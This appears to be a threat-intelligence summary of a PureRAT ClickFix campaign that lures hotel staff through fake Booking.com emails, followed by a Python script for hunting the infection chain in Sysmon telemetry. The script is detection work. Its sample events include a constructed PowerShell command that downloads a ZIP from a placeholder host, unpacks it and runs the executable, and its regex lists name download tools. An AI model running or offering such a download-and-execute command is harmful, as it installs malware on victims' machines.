PureRAT ClickFix malware delivery chain targeting hotel systems
Malware Activity
Summary
A PureRAT infection chain is actively targeting hotel systems, enabling credential theft, remote access, and command execution. The malware is delivered through ClickFix pages reached via spear-phishing emails that impersonate Booking.com. The infection flow runs a user-pasted PowerShell command that downloads a ZIP archive, loads PureRAT through DLL side-loading, and establishes persistence with a Run registry key. The activity has been observed since at least April 2025 and remained operational in early October 2025.
Related Happenings
Formbook phishing campaign using DLL sideloading and obfuscated JavaScript
Campaign
First: 20.04.2026 18:01
Last: 20.04.2026 18:01
Sources 1
About this happening:
The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Torg Grabber browser-extension theft activity
Malware Activity
First: 25.03.2026 20:32
Last: 25.03.2026 20:32
Sources 1
About this happening:
The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...
FAUX#ELEVATE phishing campaign targeting French-speaking corporate environments
Campaign
First: 24.03.2026 18:35
Last: 24.03.2026 18:35
Sources 1
About this happening:
The **FAUX#ELEVATE** phishing campaign is actively targeting **French-speaking corporate environments** with **fake resume/CV lures** that deliver malware for **credential theft**...
Silver Fox South Asia phishing campaign
Campaign
First: 24.03.2026 18:00
Last: 24.03.2026 18:00
Sources 1
About this happening:
The **Silver Fox** campaign now includes **BYOVD** abuse of a previously unknown **WatchDog Anti-malware** driver, **amsdk.sys (version 1.0.600)**, to disable security tools on co...
Timeline
- 10.11.2025 11:11 · 2 articles
Sekoia discloses Booking.com impersonation campaign deploying PureRAT against hotels
Initial Disclosure: Sekoia described a massive phishing campaign against hotel establishments that impersonates Booking.com, sends malicious messages from compromised email accounts, and lures staff to ClickFix pages with a fake reCAPTCHA flow. Victims are prompted to copy and run a malicious PowerShell command that downloads a ZIP archive, loads PureRAT (aka zgRAT) through DLL side-loading, and establishes persistence with a Run registry key, enabling credential theft, remote access, data exfiltration, and fraudulent access to booking platforms such as Booking.com and Expedia. Sekoia assessed the activity as active since at least April 2025 and operational as of early October 2025.
- Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware — thehackernews.com — 10.11.2025 11:11
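The delivery chain described in the Summary and in Sekoia's disclosure above (a pasted PowerShell line that downloads and unpacks a ZIP, a DLL side-loaded from a user-writable directory, and a Run key pointing back at it) can be hunted with ordinary host telemetry. The following is an added example, not Sekoia's detection logic and not code from the page: a heuristic correlator over Sysmon-style process-creation (Event ID 1), image-load (Event ID 7) and registry-set (Event ID 13) records. The sample events, host and user names, paths, the URL and the file names are constructed. The actual command line, archive name and side-loaded binary used by the campaign are not given on the page and are not reproduced here.

```python
"""Heuristic hunt for the ClickFix -> PowerShell -> ZIP -> DLL side-load -> Run key chain.

Added example, not Sekoia's detection logic or code from the page. Records mimic Sysmon
Event ID 1 (process create), 7 (image load) and 13 (registry value set) field names;
the sample events, hosts, paths and URL below are constructed, not real telemetry.
"""
import re
from collections import defaultdict

# Directories a standard user can write to: where a ClickFix-dropped ZIP gets unpacked.
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Temp|Downloads|Public)\\", re.I)
# Download and unpack primitives commonly chained in a single pasted PowerShell line.
DOWNLOAD_PRIMITIVES = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|\bcurl\b|Start-BitsTransfer", re.I)
ARCHIVE_PRIMITIVES = re.compile(r"Expand-Archive|ExtractToDirectory|\btar\b", re.I)
# Script hosts a victim is told to paste into; the Win+R Run dialog spawns them under explorer.exe.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    return path.rsplit("\\", 1)[0].lower()


def clickfix_launch(ev):
    """Event 1: script host spawned by explorer.exe whose command line both downloads and unpacks."""
    if ev["EventID"] != 1:
        return False
    if basename(ev["Image"]) not in SCRIPT_HOSTS or basename(ev["ParentImage"]) != "explorer.exe":
        return False
    cmd = ev["CommandLine"]
    return bool(DOWNLOAD_PRIMITIVES.search(cmd) and ARCHIVE_PRIMITIVES.search(cmd))


def sideload_candidate(ev):
    """Event 7: unsigned DLL loaded from the same user-writable directory as the loading EXE."""
    if ev["EventID"] != 7 or not ev["ImageLoaded"].lower().endswith(".dll"):
        return False
    if not USER_WRITABLE.search(ev["Image"]):
        return False
    same_dir = dirname(ev["Image"]) == dirname(ev["ImageLoaded"])
    return same_dir and ev.get("Signed", "true").lower() == "false"


def run_key_persistence(ev):
    """Event 13: a Run value whose data points into a user-writable directory."""
    if ev["EventID"] != 13:
        return False
    return bool(RUN_KEY.search(ev["TargetObject"]) and USER_WRITABLE.search(ev["Details"]))


STAGES = (
    ("clickfix_launch", clickfix_launch),
    ("dll_sideload", sideload_candidate),
    ("run_key", run_key_persistence),
)


def score_chain(events):
    """Collect stage hits per (host, user); two or more distinct stages is a high-confidence chain."""
    hits = defaultdict(set)
    for ev in events:
        for name, matcher in STAGES:
            if matcher(ev):
                hits[(ev["Computer"], ev["User"])].add(name)
    return {
        key: {"stages": sorted(stages), "severity": "high" if len(stages) >= 2 else "low"}
        for key, stages in hits.items()
    }


SAMPLE_EVENTS = [  # constructed records, not captured telemetry
    {"EventID": 1, "Computer": "FRONTDESK-01", "User": "HOTEL\\reception",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://captcha.example.invalid/verify.zip '
                    r'-OutFile $env:TEMP\v.zip; Expand-Archive $env:TEMP\v.zip $env:APPDATA\v -Force; '
                    r'Start-Process $env:APPDATA\v\host.exe"'},
    {"EventID": 7, "Computer": "FRONTDESK-01", "User": "HOTEL\\reception",
     "Image": r"C:\Users\reception\AppData\Roaming\v\host.exe",
     "ImageLoaded": r"C:\Users\reception\AppData\Roaming\v\helper.dll", "Signed": "false"},
    {"EventID": 13, "Computer": "FRONTDESK-01", "User": "HOTEL\\reception",
     "TargetObject": r"HKU\S-1-5-21-1000000001-1000000002-1000000003-1001"
                     r"\Software\Microsoft\Windows\CurrentVersion\Run\host",
     "Details": r"C:\Users\reception\AppData\Roaming\v\host.exe"},
    # Benign: admin pulls a file from a terminal, no explorer.exe parent and no unpack step.
    {"EventID": 1, "Computer": "IT-ADMIN-02", "User": "HOTEL\\itadmin",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
     "CommandLine": r'powershell -c "Invoke-WebRequest https://intranet.example.invalid/report.csv '
                    r'-OutFile C:\Reports\report.csv"'},
]

if __name__ == "__main__":
    for (host, user), verdict in score_chain(SAMPLE_EVENTS).items():
        print(f"{host} {user}: {verdict['severity']} {verdict['stages']}")
```

The explorer.exe parent is the cheapest ClickFix tell, because anything a victim pastes into the Win+R Run dialog is launched by the shell rather than by a terminal or a script scheduler. Each stage on its own is noisy (per-user installers also write to AppData and set Run values, which is why a lone hit is scored low), so the correlator only raises severity when two independent stages fire for the same host and user. The `Signed` field on image-load records is only populated when Sysmon is configured to log Event ID 7 for the relevant processes, so in a deployment without that rule the side-load stage needs a different signal, such as the EXE itself being newly written to the same directory.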